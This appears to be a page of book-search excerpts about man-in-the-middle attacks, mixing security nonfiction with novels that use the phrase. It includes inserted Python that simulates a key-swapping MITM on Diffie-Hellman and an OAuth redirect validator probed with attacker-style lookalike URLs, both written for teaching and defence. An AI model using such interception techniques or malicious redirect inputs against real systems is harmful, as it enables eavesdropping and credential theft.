Activist groups had considered the Syrian Internet to be second only to Ben Ali’s Tunisia when it came to Internet censorship in the Arab world. Bizarrely, in late February as political tensions mounted, the government suddenly unblocked social media websites such as Facebook, Blogspot, and YouTube for the first time since 2007. The reasons soon became clear: soon after the ban was lifted, government hackers launched what is known technically as a “man in the middle” attack on Syrian Facebook users, inserting a false “security certificate” onto people’s browsers when they tried to log into their Facebook accounts through the secure “https” version of the site. This attack enabled government hackers to take over activists’ accounts and gain access to their entire network of contacts. The government also wanted to use social media to get its side of the story across, with the help of citizens claiming loyalty to the government of President Bashar al-Assad.

Meanwhile, Ali Abdulemam—still in hiding—was sentenced in absentia to fifteen years in prison: Leila Nachawati, “Bahrain: Leading Blogger Ali Abdulemam Sentenced to 15 Years in Prison, Along with Other Human Rights Defenders,” Global Voices Advocacy, June 22, 2011, http://advocacy.globalvoicesonline.org/2011/06/22/bahrain-leading-blogger-ali-abdulemam-sentenced-to-15-years-in-prison-along-with-other-human-rights-defenders (all accessed June 27, 2011). 63 statement by King Hamad bin Isa Al Khalifa: “His Majesty Stresses the Key to Reform Is Through Press Freedom,” Bahrain News Agency, May 3, 2011, www.bna.bh/portal/en/news/455101 (accessed August 11, 2011). 64 In Syria, where between March and July 2011 an estimated 1,400 people were killed and at least 15,000 detained: See Neil MacFarquhar and Rick Gladstone, “Outside Pressure Builds on Syria,” New York Times, August 2, 2011, www.nytimes.com/2011/08/03/world/middleeast/03syria.html; and “Syria: Mass Arrest Campaign Intensifies,” Human Rights Watch, July 20, 2011, www.hrw.org/news/2011/07/20/syria-mass-arrest-campaign-intensifies (all accessed August 2, 2011). 64 “man in the middle” attack on Syrian Facebook users: See Anas Qtiesh, “Did Syria Replace Facebook’s Security Certificate with a Forged One?” Global Voices Advocacy, May 4, 2011, http://advocacy.globalvoicesonline.org/2011/05/05/did-syria-replace-facebooks-security-certificate-with-a-forged-one; and Leila Nachawati, “Syrian Uprisings and Official vs. Decentralized Communications,” April 27, 2011, http://advocacy.globalvoicesonline.org/2011/04/27/syrian-uprisings-and-official-vs-decentralized-communications (all accessed June 27, 2011). 64 In May, an organization called the Syrian Electronic Army (SEA) emerged: Helmi Noman, “The Emergence of Open and Organized Pro-Government Cyber Attacks in the Middle East: The Case of the Syrian Electronic Army,” Information Warfare Monitor, May 30, 2011, www.infowar-monitor.net/2011/05/7349. 
65 In June, Assad praised SEA directly: Danny O’Brien, “Syria’s Assad Gives Tacit OK to Online Attacks on Press,” June 24, 2011, www.cpj.org/internet/2011/06/syrias-assad-gives-tacit-ok-to-online-attacks-on-p.php#more. 65 the SEA claimed responsibility for attacking the website of the French embassy: “Syrian Electronic Army: Disruptive Attacks and Hyped Targets,” Information Warfare Monitor, June 25, 2011, www.infowar-monitor.net/2011/06/syrian-electronic-army-disruptive-attacks-and-hyped-targets. 67 what researchers at the Open Net Initiative call second- and third-generation Internet controls: Ronald J.


pages: 834 words: 180,700

The Architecture of Open Source Applications by Amy Brown, Greg Wilson

8-hour work day, anti-pattern, bioinformatics, c2.com, cloud computing, collaborative editing, combinatorial explosion, computer vision, continuous integration, create, read, update, delete, David Heinemeier Hansson, Debian, domain-specific language, Donald Knuth, en.wikipedia.org, fault tolerance, finite state, Firefox, friendly fire, Guido van Rossum, linked data, load shedding, locality of reference, loose coupling, Mars Rover, MITM: man-in-the-middle, MVC pattern, peer-to-peer, Perl 6, premature optimization, recommendation engine, revision control, Ruby on Rails, side project, Skype, slashdot, social web, speech recognition, the scientific method, The Wisdom of Crowds, web application, WebSocket

Mirror Authenticity

With any distributed mirroring system, clients may want to verify that the mirrored copies are authentic. Some of the possible threats include:

- the central index may be compromised
- the mirrors might be tampered with
- a man-in-the-middle attack between the central index and the end user, or between a mirror and the end user

To detect the first attack, package authors need to sign their packages using PGP keys, so that users can verify that the package comes from the author they trust. The mirroring protocol itself only addresses the second threat, though some attempt is made to detect man-in-the-middle attacks. The central index provides a DSA key at the URL /serverkey, in the PEM format as generated by openssl dsa -pubout. This URL must not be mirrored, and clients must fetch the official serverkey from PyPI directly, or use the copy that came with the PyPI client software.

Verification is not needed when downloading from the central index, and clients should not do it, to reduce the computation overhead. About once a year, the key will be replaced with a new one. Mirrors will have to re-fetch all /serversig pages. Clients using mirrors need to find a trusted copy of the new server key. One way to obtain one is to download it from https://pypi.python.org/serverkey. To detect man-in-the-middle attacks, clients need to verify the SSL server certificate, which will be signed by the CACert authority.

14.5. Implementation Details

The implementation of most of the improvements described in the previous section is taking place in Distutils2. The setup.py file is not used anymore, and a project is completely described in setup.cfg, a static .ini-like file. By doing this, we make it easier for packagers to change the behavior of a project installation without having to deal with Python code.


pages: 404 words: 113,514

Atrocity Archives by Stross, Charles

airport security, anthropic principle, Berlin Wall, brain emulation, British Empire, Buckminster Fuller, defense in depth, disintermediation, experimental subject, glass ceiling, haute cuisine, hypertext link, Khyber Pass, mandelbrot fractal, Menlo Park, MITM: man-in-the-middle, NP-complete, the medium is the message, Y2K, yield curve

"Where were you on Thursday the nineteenth of last month?" "Er, I was attending a training course: Introduction to Applied Occult Computing 104, conducted by Dr. Vohlman." The balding man in the middle makes a doodle on his pad then fixes me with a cold stare. "Your opinion of the course?" "My--er?" I freeze for a moment; this isn't in the script. "I was bored silly--um, the course was fine, but it was a bit basic. I was only there because Harriet was pissed off at me for coming in late after putting in a twenty-hour shift. Dr. Vohlman did a good job, but really it was insanely basic and I didn't learn anything new and wasn't paying much attention--" Why am I saying this? The man in the middle looks at me again. It's like being under a microscope; I feel the back of my neck burst out in a cold, prickly sweat. "When you weren't paying attention, what were you doing?"


pages: 349 words: 114,038

Culture & Empire: Digital Revolution by Pieter Hintjens

4chan, airport security, AltaVista, anti-communist, anti-pattern, barriers to entry, Bill Duvall, bitcoin, blockchain, business climate, business intelligence, business process, Chelsea Manning, clean water, commoditize, congestion charging, Corn Laws, correlation does not imply causation, cryptocurrency, Debian, Edward Snowden, failed state, financial independence, Firefox, full text search, German hyperinflation, global village, GnuPG, Google Chrome, greed is good, Hernando de Soto, hiring and firing, informal economy, intangible asset, invisible hand, James Watt: steam engine, Jeff Rulifson, Julian Assange, Kickstarter, M-Pesa, mass immigration, mass incarceration, mega-rich, MITM: man-in-the-middle, mutually assured destruction, Naomi Klein, national security letter, Nelson Mandela, new economy, New Urbanism, Occupy movement, offshore financial centre, packet switching, patent troll, peak oil, pre–internet, private military company, race to the bottom, rent-seeking, reserve currency, RFC: Request For Comment, Richard Feynman, Richard Stallman, Ross Ulbricht, Satoshi Nakamoto, security theater, selection bias, Skype, slashdot, software patent, spectrum auction, Steve Crocker, Steve Jobs, Steven Pinker, Stuxnet, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, trade route, transaction costs, twin studies, union organizing, wealth creators, web application, WikiLeaks, Y2K, zero day, Zipf's Law

Anyone who has B can decrypt it, and they know it came from me. This gives us secrecy, thanks to the encryption, and also "authentication," which is the knowledge that the data really came from me, and not an impostor. There is little point in encryption if we can't be sure of the sender. There's a small catch: you also need to be sure that B is really my key, and was not switched by some "man in the middle," or MIM. For asymmetric keys to work at all well, those encryption keys must be exchanged securely, which creates an interesting Catch-22 that attackers exploit. The keys must also, and this is very important, be really random and unguessable. If you can guess the keys, the whole encryption exercise is for naught. Even if your guesses are very vague, it can make the difference between trying different keys for an hour, or for 50 years.

Hence the emotional discussions on the Linux lists about that random number generator patch. In 2013, any security product that isn't open source isn't credible. We're still not secure, however. Let's say we can generate really strong keys that no-one could ever guess, immune from rubber-hose attacks, and hard enough to crack that it would take a zillion years to try all combinations. It's still trivial to break such security, if I can do a man in the middle attack. A MIM attack takes advantage of the fact that even if we can create secure keys, we need some way to exchange them. It's like me sending the key to my house in the mail to a person coming to stay. An attacker can open the mail, take out my key, substitute his, with a letter containing an impostor address. The poor visitor will come to the wrong house, enter, and know nothing. Meanwhile the attacker can enter my house, pretending to be the visitor.
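The key-switching attack described above, run on an actual key exchange, as an added example that is not from the book. It performs Diffie-Hellman agreement three ways: directly, through an attacker who replaces each party's public value with her own, and with the public value authenticated against a fingerprint learned out of band (the "exchange the keys securely" step the text calls a Catch-22). The group is the Mersenne prime 2^521-1 with generator 3, an assumption chosen so the block needs no libraries; real software uses a standard group or an elliptic curve, and in practice the out-of-band fingerprint is replaced by a certificate or a signature from a key already trusted.

```python
"""Diffie-Hellman with and without a man in the middle. Example code, not
from the book. Group parameters are a demonstration choice, not a standard."""
import hashlib
import secrets

P = (1 << 521) - 1   # prime modulus (assumption of this example)
G = 3
_LEN = (P.bit_length() + 7) // 8


def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def shared_key(priv: int, peer_pub: int) -> bytes:
    """256-bit session key derived from the DH shared secret."""
    secret = pow(peer_pub, priv, P)
    return hashlib.sha256(secret.to_bytes(_LEN, "big")).digest()


def fingerprint(pub: int) -> str:
    """Short hash of a public value, the kind of thing read out over the phone."""
    return hashlib.sha256(pub.to_bytes(_LEN, "big")).hexdigest()[:16]


def direct_exchange() -> bool:
    """No attacker: both sides derive the same key."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    return shared_key(a_priv, b_pub) == shared_key(b_priv, a_pub)


def mitm_exchange() -> dict:
    """Mallory swaps both public values for her own: Alice and Bob each
    share a key with Mallory, not with each other, and neither can tell."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    m_priv, m_pub = keypair()
    k_alice = shared_key(a_priv, m_pub)          # Alice thinks m_pub is Bob's
    k_bob = shared_key(b_priv, m_pub)            # Bob thinks m_pub is Alice's
    k_mallory_alice = shared_key(m_priv, a_pub)
    k_mallory_bob = shared_key(m_priv, b_pub)
    return {
        "alice_bob_agree": k_alice == k_bob,
        "mallory_reads_alice": k_alice == k_mallory_alice,
        "mallory_reads_bob": k_bob == k_mallory_bob,
    }


def authenticated_exchange(mallory_present: bool) -> bool:
    """Alice checks the fingerprint of the value she received against one
    she obtained out of band before the exchange; a swapped value aborts."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    trusted_fp_of_bob = fingerprint(b_pub)       # learned out of band earlier
    received = b_pub
    if mallory_present:
        _, m_pub = keypair()
        received = m_pub                          # substituted in transit
    if fingerprint(received) != trusted_fp_of_bob:
        return False                              # abort: key was switched
    return shared_key(a_priv, received) == shared_key(b_priv, a_pub)


if __name__ == "__main__":
    print("direct:", direct_exchange())
    print("mitm:", mitm_exchange())
    print("authenticated, no attacker:", authenticated_exchange(False))
    print("authenticated, with attacker:", authenticated_exchange(True))
```

Nothing about the strength of the keys changes between the three runs; the only difference is whether the public value was authenticated, which is exactly the gap the text says a MIM exploits.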


pages: 443 words: 116,832

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics by Ben Buchanan

active measures, Bernie Sanders, bitcoin, blockchain, borderless world, Brian Krebs, British Empire, Cass Sunstein, citizen journalism, credit crunch, cryptocurrency, cuban missile crisis, data acquisition, Donald Trump, drone strike, Edward Snowden, family office, hive mind, Internet Archive, Jacob Appelbaum, John Markoff, John von Neumann, Julian Assange, Kickstarter, kremlinology, MITM: man-in-the-middle, Nate Silver, profit motive, RAND corporation, ransomware, risk tolerance, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Silicon Valley, South China Sea, Steve Jobs, Stuxnet, technoutopianism, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, zero day

Even as the PLA generated new hop points, TAO had such good access and insight into the PLA’s efforts that it could identify the new computers fairly easily. But why stop there? Instead of observing from hop points and watching from the PLA’s internet provider, TAO could go further. The NSA’s hackers could, at long last, target the actual computers owned by the hackers in this part of the PLA. TAO employed something called a man-in-the-middle operation. This requires access to the target’s internet traffic, access that TAO’s hacking efforts had gained with their penetration of China’s hacking infrastructure. From this privileged vantage point, the NSA’s hackers could intercept and sometimes manipulate the PLA’s data as it moved from its source to its destination and back again.9 Using this access, TAO appears to have added some secret malicious code to the PLA’s normal internet traffic, hacking the computers from which the Chinese carried out their operations.

See also AT&T; corporations compellence, 168–169 competition, 5, 9 conventional operations, compared to cyber operations, 189 Conway, Kellyanne, 239 cookies, 35 corporate access: by China, 88; shaping and, 39; signaling and, 39 corporations: access to data from, combined with passive collection, 13–39; intelligence community and, 15–16, 64–85; laws compelling cooperation of, 25. See also AT&T; commercial partnerships Cosmos Cooperative Bank, 284–287 counterfeiting, 268–269, 270–271 counterintelligence, 108–125; ARROWECLIPSE, 112–113; detecting adversary’s hacking efforts against other targets, 116–120; fourth-party collection, 120–125; man-in-the-middle operations, 114–115; persistence / aggressiveness in, 116; proactive, 109–110, 112; Tailored Access Operations (TAO), 112–115, 117, 258; targeting hop points, 112–113; Territorial Dispute (TeDi) program, 117–118, 120; uncovering of new actors by, 118–120 counternarcotics, 32 covert action, 309 CRASHOVERRIDE, 197–201, 204, 205, 310 credentials, stolen, 38, 191–193; DNC employees’, 215; in election interference, 218–220; in North Korean campaign, 276; in second Ukraine blackout, 197.


pages: 587 words: 117,894

Cybersecurity: What Everyone Needs to Know by P. W. Singer, Allan Friedman

4chan, A Declaration of the Independence of Cyberspace, Apple's 1984 Super Bowl advert, barriers to entry, Berlin Wall, bitcoin, blood diamonds, borderless world, Brian Krebs, business continuity plan, Chelsea Manning, cloud computing, crowdsourcing, cuban missile crisis, data acquisition, do-ocracy, drone strike, Edward Snowden, energy security, failed state, Fall of the Berlin Wall, fault tolerance, global supply chain, Google Earth, Internet of things, invention of the telegraph, John Markoff, Julian Assange, Khan Academy, M-Pesa, MITM: man-in-the-middle, mutually assured destruction, Network effects, packet switching, Peace of Westphalia, pre–internet, profit motive, RAND corporation, ransomware, RFC: Request For Comment, risk tolerance, rolodex, Silicon Valley, Skype, smart grid, Steve Jobs, Stuxnet, uranium enrichment, We are Anonymous. We are Legion, web application, WikiLeaks, zero day, zero-sum game

Not so coincidentally, this was the exact setup at the Natanz nuclear facility, a suspected site in Iran’s illicit nuclear weapons program. Things got especially tricky once Stuxnet found its way into this target (it was later revealed that the delivery mechanism was infiltration through Iranian nuclear scientists’ own laptops and memory sticks). Langner discovered that the cyberattack didn’t shut down the centrifuges in any obvious manner. Instead, it ran a series of subroutines. One, known as a “man in the middle,” caused tiny adjustments in pressure inside the centrifuges. Another manipulated the speed of the centrifuges’ spinning rotors, causing them to alternately slow down and then speed back up, throwing the rotors out of whack and ruining their work. On top of this, every so often the malware would push the centrifuge speeds past the designed maximum. So the centrifuges weren’t just failing to produce refined uranium fuel, they were frequently breaking down and grinding to a halt from the damaging vibrations that the various random surges caused.

When he went out, agents from Mossad, the Israeli intelligence agency, snuck into his room and installed a Trojan horse onto the laptop to allow them to monitor his communications. That was bad enough for the Syrians. But one man’s poor computer security turned out to have more significant consequences when the Israelis began to examine the files that the official had stored on the laptop’s hard drive, including pictures. One photo in particular caught the Israelis’ attention. It showed an Asian man in a blue tracksuit standing next to an Arab man in the middle of the Syrian desert. It could have been innocuous, but then Mossad identified the two men as Chon Chibu, a leader of the North Korean nuclear program, and Ibrahim Othman, director of the Syrian Atomic Energy Commission. Combined with other documents lifted from the hard drive, such as construction plans and photos of a type of pipe used for work on fissile materiel, the Israelis realized the laptop was an atomic alarm bell.


pages: 461 words: 125,845

This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers by Andy Greenberg

Apple II, Ayatollah Khomeini, Berlin Wall, Bill Gates: Altair 8800, Burning Man, Chelsea Manning, computerized markets, crowdsourcing, cryptocurrency, domain-specific language, drone strike, en.wikipedia.org, fault tolerance, hive mind, Jacob Appelbaum, Julian Assange, Mahatma Gandhi, Mitch Kapor, MITM: man-in-the-middle, Mohammed Bouazizi, nuclear winter, offshore financial centre, pattern recognition, profit motive, Ralph Nader, Richard Stallman, Robert Hanssen: Double agent, Silicon Valley, Silicon Valley ideology, Skype, social graph, statistical model, stem cell, Steve Jobs, Steve Wozniak, Steven Levy, undersea cable, Vernor Vinge, We are Anonymous. We are Legion, We are the 99%, WikiLeaks, X Prize, Zimmermann PGP

If Alice in New York wants to send a private message to Bob in London, she uses a private key to encrypt her message and Bob uses the same key to decrypt it. But there’s an inherent Achilles’ heel in that scheme: If Bob has never met Alice, how does Bob get Alice’s key securely? She has to send it to him somehow. But they can’t encrypt the message that carries the key—they come up against the same problem of how to send a key that decrypts that message. If Alice gives up and mails Bob an unencrypted key, on the other hand, any sinister man-in-the-middle could intercept it, copy it, send it on its way, and then decode all their future messages. Unless Alice and Bob have already met in some dark alley and shared their key, private key encryption is hardly private at all. (In fact, it’s called “private key encryption” precisely because the key must be kept private, which is what makes actually using it so tough.) Public key encryption, on the other hand, uses some mathematical tricks that vaporize that private key problem as thoroughly as a used one-time pad in a burn bag.

And it has the unique, almost magical property: What’s encrypted with that key can only be decrypted with Bob’s private key. Suddenly the conundrum of how Alice mails the private key to Bob disappears. Bob already has the private key, and he can send his public key—the key Alice needs to encrypt messages that only Bob can unlock—to Alice on a postcard from London to New York. The sinister man-in-the-middle can read that postcard all he likes. Not only that, Bob posts his public key on his website, prints it on his business card, and even adds it to the signature of his e-mail. In fact, Bob wants everyone to see the public key, because it’s used for harmlessly scrambling secrets, not unscrambling them. Bob’s private key, meanwhile, remains cozily stored on his hard drive, and never has to be shipped across the Atlantic Ocean.


Drown by Junot Diaz

MITM: man-in-the-middle

The small man wept quietly. How far you going? the driver asked. New York, he said, carefully omitting the Nueva and the Yol. We ain’t going that far but you can ride with us to Trenton if you like. Where the hell you from pal? Miami. Miami. Miami’s kind of far from here. The other man looked at the driver. Are you a musician or something? Jes, Papi said. I play the accordion. That excited the man in the middle. Shit, my old man played the accordion but he was a Polack like me. I didn’t know you spiks played it too. What kind of polkas do you like? Polkas? Jesus, Will, the driver said. They don’t play polkas in Cuba. They drove on, slowing only to unfold their badges at the tolls. Papi sat still and listened to the man crying in the back. What is wrong? Papi asked. Maybe sick? The driver snorted.


pages: 170 words: 51,205

Information Doesn't Want to Be Free: Laws for the Internet Age by Cory Doctorow, Amanda Palmer, Neil Gaiman

Airbnb, barriers to entry, Brewster Kahle, cloud computing, Dean Kamen, Edward Snowden, game design, Internet Archive, John von Neumann, Kickstarter, MITM: man-in-the-middle, optical character recognition, plutocrats, Plutocrats, pre–internet, profit maximization, recommendation engine, rent-seeking, Saturday Night Live, Skype, Steve Jobs, Steve Wozniak, Stewart Brand, transfer pricing, Whole Earth Catalog, winner-take-all economy

Playing shenanigans with DNS has lots of upsides, if you’re a criminal or an oppressive government. Criminals like to hack DNS servers to redirect requests like “www.citibank.com” to lookalike webpages that they operate, so that they can get your banking details and clean you out when you unsuspectingly type in your password. Oppressive governments like to redirect gmail.com and facebook.com to their own “man-in-the-middle” servers, so that they can snoop on citizens’ email and figure out whom to arrest. Lots of people are trying to solve the DNS problem. It is real, and grave. Many Internet-security experts consider the insecurity of DNS to represent an existential threat to the Internet itself, and there are many efforts under way, like DNSSEC, to add a layer of security to the service. Your ability to vote, interact with your government, bank, get an education, and securely conduct most of the rest of your online life is dependent on the outcome of these efforts.


Designing Web APIs: Building APIs That Developers Love by Brenda Jin, Saurabh Sahni, Amir Shevat

active measures, Amazon Web Services, augmented reality, blockchain, business process, continuous integration, create, read, update, delete, Google Hangouts, if you build it, they will come, Lyft, MITM: man-in-the-middle, premature optimization, pull request, Silicon Valley, Snapchat, software as a service, the market place, uber lyft, web application, WebSocket

This way, if client secrets and refresh tokens are compromised, applications can stop an attacker with a leaked client secret from renewing access tokens.

OAuth scopes for sensitive information
Protect sensitive information on your service by using dedicated OAuth scopes. This way, your users will not grant access to sensitive information to every application that might not need it.

HTTPS endpoints
Because access tokens are sent as part of every HTTP request, it's important that your API endpoints require HTTPS. This prevents man-in-the-middle attacks.

Verify redirect URL
When the optional redirect URL is provided during an authorization request, ensure that it matches one of the registered URLs for the application. If not, the API server must show an error without showing the authorization prompt. This ensures that any returned secrets are not exposed to an attacker.

Disallow rendering the authorization screen in iframes
Use the X-Frame-Options header to deny rendering an authorization page in an iframe.
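The redirect-URL check and the anti-framing header from the list above, as an authorization server would implement them; this is an added example, not code from the book. It compares the supplied redirect URL against the registered ones by exact match after a strict parse, and keeps the common prefix-match shortcut alongside only to show the lookalike URLs it lets through (an attacker who gets the authorization code sent to a URL under their control is the "returned secrets exposed" case). The client id, hostnames and paths are constructed placeholders; the Content-Security-Policy line is the modern equivalent of X-Frame-Options, added beyond what the text lists.

```python
"""OAuth authorization endpoint hardening: exact redirect_uri matching and
anti-framing headers. Example code, not from the book; names are placeholders."""
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed registry: client id -> registered redirect URLs (exact strings).
REGISTERED_REDIRECTS: Dict[str, List[str]] = {
    "client-123": ["https://app.example.test/oauth/callback"],
}


def prefix_match_redirect(client_id: str, redirect_uri: str) -> bool:
    """The common mistake: accept anything that starts with a registered URL.
    Present only to show what it accepts; do not use."""
    return any(redirect_uri.startswith(r) for r in REGISTERED_REDIRECTS.get(client_id, []))


def validate_redirect(client_id: str, redirect_uri: Optional[str]) -> Optional[str]:
    """Return the URL to redirect to, or None, in which case the server renders
    an error page and never shows the consent prompt."""
    registered = REGISTERED_REDIRECTS.get(client_id, [])
    if redirect_uri is None:
        # Parameter omitted: only unambiguous when exactly one URL is registered.
        return registered[0] if len(registered) == 1 else None
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https" or not parts.netloc or "@" in parts.netloc:
        return None            # plaintext or userinfo tricks are rejected outright
    if parts.query or parts.fragment:
        return None            # no attacker-chosen parameters ride along
    return redirect_uri if redirect_uri in registered else None


def authorization_page_headers() -> Dict[str, str]:
    """Response headers for the consent page."""
    return {
        "X-Frame-Options": "DENY",                          # as the text recommends
        "Content-Security-Policy": "frame-ancestors 'none'",  # modern equivalent
        "Cache-Control": "no-store",
    }


if __name__ == "__main__":
    probes = [
        "https://app.example.test/oauth/callback",
        "https://app.example.test/oauth/callback?next=https://evil.test",
        "https://app.example.test/oauth/callbackx",
        "https://app.example.test.evil.test/oauth/callback",
        "http://app.example.test/oauth/callback",
    ]
    for uri in probes:
        print(f"{uri}\n  prefix-match: {prefix_match_redirect('client-123', uri)}"
              f"  exact: {validate_redirect('client-123', uri) is not None}")
```

Registering full URLs and comparing them exactly is what makes the check meaningful; the prefix version accepts both a query string that can carry an open redirect and a path that merely begins with the registered one.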


pages: 225 words: 55,458

Back to School: Why Everyone Deserves a Second Chance at Education by Mike Rose

blue-collar work, centre right, creative destruction, delayed gratification, George Santayana, income inequality, MITM: man-in-the-middle, moral panic, new economy, Ronald Reagan, The Bell Curve by Richard Herrnstein and Charles Murray, the built environment, urban renewal, War on Poverty

Her life and the lives of the other students we’ve met demonstrate that habits of mind, reflection and thoughtfulness, exploration and experimentation can be sparked both in classrooms and in the workshop, reading a book and learning a trade. We ourselves have to be more creative in fusing book and workshop for those who go to school to fashion a better life.

four
Who We Are: Portraits from an Urban Community College

I. Remedial English

“Forlorn,” the instructor, Mr. Quijada, asks, looking up from the essay the class is discussing. “What’s forlorn mean?” “Desire,” says the older man in the middle of the room—glasses, graying dreadlocks pulled back—then in the same breath adds “longing.” “Close, Leonard,” Mr. Quijada replies. “Longing can certainly lead to being forlorn.” Casually strategic, Mr. Quijada looks to the last row. “Kimberly, it’s good to see you back. Do you want to add to Leonard’s definition?” Kimberly shakes her head, softly says “no,” and looks to the young woman in the hoodie next to her who answers, “Sad; it means to be sad.”


The Minor Adjustment Beauty Salon: No. 1 Ladies' Detective Agency by Alexander McCall Smith

MITM: man-in-the-middle

At one level the answer was simple—he had never vacuumed the house—but there was an even more profound issue to be resolved: Did they even have a vacuum cleaner? If there was no vacuum cleaner, then it would look less bad for him that he had never used one in the house. Mind you, he had never swept the house either—and they did have a broom. A forest of hands went up, but it did not include his. Keitumeste pointed at a man in the middle. “Yes, Rra? When did you do that?” The man answered in a clear, confident voice. “Yesterday, Mma. I vacuumed the living room and the dining room, too. I would have done more if I had not been so tired.” Keitumeste nodded. “And what sort of vacuum cleaner is it, Rra?” The question, so innocently put, found its target. The man opened his mouth to speak, and then closed it. “You don’t know, do you?”


pages: 266 words: 80,018

The Snowden Files: The Inside Story of the World's Most Wanted Man by Luke Harding

affirmative action, airport security, Anton Chekhov, Apple's 1984 Super Bowl advert, Berlin Wall, Chelsea Manning, don't be evil, drone strike, Edward Snowden, Etonian, Firefox, Google Earth, Jacob Appelbaum, job-hopping, Julian Assange, Khan Academy, kremlinology, Mark Zuckerberg, Maui Hawaii, MITM: man-in-the-middle, national security letter, Panopticon Jeremy Bentham, pre–internet, Ralph Waldo Emerson, rolodex, Rubik’s Cube, Silicon Valley, Skype, social graph, Steve Jobs, undersea cable, web application, WikiLeaks

He (or it could have been a she) wrote: ‘I have some stuff you might be interested in.’ ‘He was very vague,’ Greenwald recalls. This mystery correspondent had an unusual request: he asked Greenwald to install PGP encryption software on to his laptop. Once up and running, it allows two parties to carry out an encrypted online chat. If used correctly, PGP guarantees privacy (the initials stand for ‘Pretty Good Privacy’); it prevents a man-in-the-middle attack by a third party. The source didn’t explain why this curious measure was needed. Greenwald had no objections – he had been meaning for some time to set up a tool widely employed by investigative journalists, by WikiLeaks and by others suspicious of government snooping. But there were two problems. ‘I’m basically technically illiterate,’ he admits. Greenwald also had a lingering sense that the kind of person who insisted on encryption might turn out to be slightly crazy.


pages: 313 words: 75,583

Ansible for DevOps: Server and Configuration Management for Humans by Jeff Geerling

AGPL, Amazon Web Services, cloud computing, continuous integration, database schema, Debian, defense in depth, DevOps, fault tolerance, Firefox, full text search, Google Chrome, inventory management, loose coupling, microservices, Minecraft, MITM: man-in-the-middle, Ruby on Rails, web application

Try running traceroute google.com in your terminal. Look at each of the hops between you and Google’s CDN. Do you know who controls each of the devices between your computer and Google? Do you trust these operators with all of your personal or corporate secrets? Probably not. Each of these connection points—and each network device and cable connecting them—is a weak point exposing you to a man-in-the-middle attack. Strong encryption is needed between your computer and the destination if you want to ensure data security.
rlogin, rsh and rcp
rlogin was introduced in BSD 4.2 in 1983, and has been distributed with many UNIX-like systems alongside Telnet until recently. rlogin was used widely during the 80s and much of the 90s. Just like Telnet, a user could log into the remote system with a password, but rlogin additionally allowed automatic (passwordless) logins for users on trusted remote computers. rlogin also worked better than telnet for remote administration, as it worked correctly with certain characters and commands where telnet required extra translation.


pages: 302 words: 74,350

I Hate the Internet: A Novel by Jarett Kobek

Anne Wojcicki, Burning Man, disruptive innovation, East Village, Edward Snowden, Golden Gate Park, Google bus, Google Glasses, Google X / Alphabet X, immigration reform, indoor plumbing, informal economy, Jeff Bezos, liberation theology, Mark Zuckerberg, MITM: man-in-the-middle, Norman Mailer, nuclear winter, packet switching, PageRank, Peter Thiel, quantitative easing, Ray Kurzweil, rent control, Ronald Reagan, Silicon Valley, Steve Jobs, technological singularity, Triangle Shirtwaist Factory, union organizing, V2 rocket, Vernor Vinge, wage slave, Whole Earth Catalog

A few months after graduation, Dennis offered Erik a job with Fear and Respect Holdings Ltd. Dennis formed Fear and Respect with a capital seed of $100,000,000. The money was a graduation present from his father. For over three decades, the old man, His Royal Highness Fatih bin Muhammad bin Abdulaziz al Saud, had run his own company. He’d built it into a powerhouse and made himself the third richest man in the Middle East. One of Fatih bin Muhammad’s few failures came during the dotcom era of the 1990s, when he’d lost a lot of money on bad investments. The most notorious was Kozmo.com. Kozmo.com was a one-hour delivery service that sold goods below cost and hoped to make up the money on delivery fees. The hysteria of the moment was such that even with a business model dedicated to losing money, the company raised about $250,000,000 in capital.


pages: 338 words: 74,302

Only Americans Burn in Hell by Jarett Kobek

AltaVista, coherent worldview, corporate governance, crony capitalism, Donald Trump, East Village, ghettoisation, Google Chrome, haute couture, illegal immigration, indoor plumbing, Jeff Bezos, mandelbrot fractal, MITM: man-in-the-middle, pre–internet, sexual politics, Skype, Snapchat, Steve Jobs, Telecommunications Act of 1996

If people require safe spaces, then I see nothing wrong with providing them, as long as the institution tempers their presence with a robust environment of educational rigor.” When the questions were over, pleasantries were exchanged. HRH texted his manservant Dmitri Huda. “HEY NONNY HEY, ARE THINGS IN ORDER?????” asked HRH. “Yes, Dennis,” texted Dmitri Huda. “I’m downstairs.” HRH’s father Fatih bin Muhammad bin Abdulaziz Al Saud was the second-richest man in the Middle East. He built a fortune after being exiled from the Kingdom. This exile followed the parking-lot execution of Misha’al bint Fahd bin Muhammad bin Abdulaziz Al Saud. Fatih bin Muhammad was a convenient scapegoat for the assassination. It was said that he encouraged delusions of romance in Misha’al. He was given the riyal equivalent of $200,000. He was kicked the fuck out. He traded off the family name, got into construction and concrete, and used that money to diversify his holdings.


pages: 1,380 words: 190,710

Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems by Heather Adkins, Betsy Beyer, Paul Blankinship, Ana Oprea, Piotr Lewandowski, Adam Stubblefield

anti-pattern, barriers to entry, bash_history, business continuity plan, business process, Cass Sunstein, cloud computing, continuous integration, correlation does not imply causation, create, read, update, delete, cryptocurrency, cyber-physical system, database schema, Debian, defense in depth, DevOps, Edward Snowden, fault tolerance, fear of failure, general-purpose programming language, Google Chrome, Internet of things, Kubernetes, load shedding, margin call, microservices, MITM: man-in-the-middle, performance metric, pull request, ransomware, revision control, Richard Thaler, risk tolerance, self-driving car, Skype, slashdot, software as a service, source of truth, Stuxnet, Turing test, undersea cable, uranium enrichment, Valgrind, web application, Y2K, zero day

You can create this environment in various ways—for example, through a sandbox on the same machine as the orchestrator, or by running on a separate machine.
Unauthenticated inputs
